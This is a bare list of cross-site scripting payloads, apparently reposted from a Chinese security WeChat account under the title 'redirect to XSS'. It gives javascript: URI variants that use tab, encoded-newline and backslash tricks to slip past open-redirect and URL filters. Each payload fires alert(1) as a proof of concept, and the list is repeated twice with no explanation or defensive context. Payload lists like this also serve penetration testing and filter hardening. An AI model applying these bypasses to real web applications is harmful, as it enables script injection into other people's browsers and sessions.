Payload
→javascript:alert(1)→%09Jav%09ascript:alert(1)→javascript://%250Alert(1)→/%09/javascript:alert(1);→//%5cjavascript:alert(1);→<>javascript:alert(1);→//javascript:alert(1);→javascript:alert(1)
→javascript:alert(1)
→%09Jav%09ascript:alert(1)
→javascript://%250Alert(1)
→/%09/javascript:alert(1);
→//%5cjavascript:alert(1);
→<>javascript:alert(1);
→//javascript:alert(1);
原文始发于微信公众号(Khan安全攻防实验室):重定向到XSS